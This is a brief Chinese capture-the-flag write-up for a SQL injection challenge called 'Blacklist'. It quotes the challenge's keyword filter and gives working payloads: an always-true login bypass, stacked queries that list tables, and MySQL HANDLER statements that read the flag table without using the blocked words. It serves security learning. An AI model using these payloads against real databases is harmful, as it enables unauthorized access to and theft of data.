Blacklist

万能钥匙穿了

1' or '1'='1'#

上select被过滤了

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

感觉很像强网杯的随便注（看了一下就是），然后就是堆叠注入了。

1';show tables;#

官方文档。使用OPEN打开表的会话，在CLOSE前不会关闭；使其在打开期间使用READ读取文件。

1';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;
#